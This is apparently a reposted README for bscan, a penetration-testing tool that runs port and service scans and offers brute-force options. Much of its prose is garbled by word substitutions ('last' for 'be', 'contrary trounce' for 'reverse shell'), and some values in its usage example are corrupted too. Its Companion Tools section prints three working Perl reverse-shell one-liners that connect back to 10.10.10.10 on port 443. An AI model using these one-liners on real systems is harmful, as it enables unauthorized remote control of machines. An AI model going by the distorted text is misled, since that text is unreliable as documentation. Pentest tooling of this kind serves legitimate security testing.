Bscan - An Asynchronous Target Enumeration Tool



Synopsis
bscan is a command-line utility to perform active information gathering together with service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output together with a well-defined directory structure.

Installation
bscan was written to last run on Kali Linux, but in that place is naught inherently preventing it from running on whatever OS amongst the appropriate tools installed.
Download the latest packaged version from PyPI:
pip install bscan
Or teach the bleeding-edge version from version control:
pip install https://github.com/welchbj/bscan/archive/master.tar.gz

Basic Usage
bscan has a broad multifariousness of configuration options which tin last used to melody scans to your needs. Here's a quick example:
$ bscan \ > --max-concurrency iii \ > --patterns [Mm]icrosoft \ > --status-interval 10 \ > --verbose-status \ > scanme.nmap.org
What's going on here?
  • --max-concurrency 3 way that no to a greater extent than than iii concurrent scan subprocesses volition last run at a time
  • --patterns [Mm]icrosoft defines a custom regex pattern amongst which to highlight matches inwards the generated scan output
  • --status-interval 10 tells bscan to impress runtime condition updates every 10 seconds
  • --verbose-status way that each of these condition updates volition impress details of all currently-running scan subprocesses
  • scanme.nmap.org is the host upon which nosotros desire to enumerate
bscan also relies on simply about additional configuration files. The default files tin last constitute inwards the bscan/configuation directory together with serve the next purposes:
  • patterns.txt specifies the regex patterns to last highlighted inwards console output when matched amongst scan output
  • required-programs.txt specifies the installed programs that bscan plans on using
  • port-scans.toml defines the port-discovering scans to last run on the target(s), equally good equally the regular expressions used to parse port numbers together with service names from scan output
  • service-scans.toml defines the scans last run on the target(s) on a per-service basis

Detailed Options
Here's what yous should encounter when running bscan --help:
usage: bscan [OPTIONS] targets   _ | |__  ___  ___ __ _ _ __ | '_ \/ __|/ __/ _` | '_ \ | |_) \__ \ (__ (_| | | | | |_.__/|___/\___\__,_|_| |_|  an asynchronous service enumeration tool  positional arguments:   targets               the targets and/or networks on which to perform enumeration  optional arguments:   -h, --help            exhibit this assist message together with teach out   --brute-pass-list F   filename of password listing to utilization for brute-forcing   --brute-user-list F   filename of user listing to utilization for brute-forcing   --cmd-print-width I   the maximum integer pose out of characters allowed when printing                         the command used to spawn a running subprocess (defaults to 80)   --config-dir D        the base of operations directory from which to charge the configuration files;                         required configuration files missing from this directory volition                         instead last loaded from the default files shipped amongst this                         computer program   --hard                strength overwrite of existing directories   --max-concurrency I   maximum integer pose out of subprocesses permitted to last running                         concurrently (defaults to 20)   --no-program-check    disable checking the presence of required arrangement programs   --no-file-check       disable checking the presence of files such equally configured                         wordlists   --no-service-scans    disable running scans on discovered services   --output-dir D        the base of operations directory inwards which to write output files   --patterns [ [ ...]]  regex patterns to highlight inwards output text   --ping-sweep          enable ping sweep filtering of hosts from a network hit                         earlier running to a greater extent than intensive scans   --quick-only          whether to alone run the quick scan (and non include the                         thorough scan over all ports)   --qs-method southward         the method for performing the initial TCP port scan; must                         represent to a configured port scan   --status-interval I   integer pose out of seconds to recess inwards betwixt printing condition                         updates; a non-positive value disables updates (defaults to 30)   --ts-method southward         the method for performing the thorough TCP port scan; must                         represent to a configured port scan   --udp                 whether to run UDP scans   --udp-method southward        the method for performing the UDP port scan; must represent                         to a configured port scan   --verbose-status      whether to impress verbose runtime condition updates, based on                         frequency specified past times `--status-interval` flag   --version             computer program version   --web-word-list F     the wordlist to utilization for scans

Companion Tools
The original bscan computer program ships amongst ii utility programs (bscan-wordlists together with bscan-shells) to brand your life a petty easier when looking for wordlists together with trying to opened upwards contrary shells.
bscan-wordlists is a computer program designed for finding wordlist files on Kali Linux. It searches a few default directories together with allows for glob filename matching. Here's a uncomplicated example:
$ bscan-wordlists --find "*win*" /usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt /usr/share/wordlists/metasploit/sensitive_files_win.txt /usr/share/seclists/Passwords/common-passwords-win.txt
Try bscan-wordlists --help to explore other options.
bscan-shells is a computer program that volition generate a multifariousness of contrary trounce one-liners amongst target together with port fields populated for you. Here's a uncomplicated lawsuit to listing all Perl-based shells, configured to connect dorsum to 10.10.10.10 on port 443:
$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl perl for windows perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$ ->fdopen($c,w);system$_ while<>;'  perl amongst /bin/sh perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'  perl without /bin/sh perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$ ->fdopen($c,w);system$_ while<>;'
Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells --help to explore other options.

Development
Start past times setting upwards a novel evolution surroundings together with installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):
# setup the surroundings mkvirtualenv -p $(which python3) bscan-dev workon bscan-dev  # teach the deps pip install -r dev-requirements.txt
Lint together with type-check the projection (these are run on Travis, too):
flake8 . && mypy bscan
When it's fourth dimension to bundle a novel release:
# construct source together with cycle distributions python setup.py bdist_wheel sdist  # run post-build checks twine banking concern check dist/*  # upload to PyPI twine upload dist/*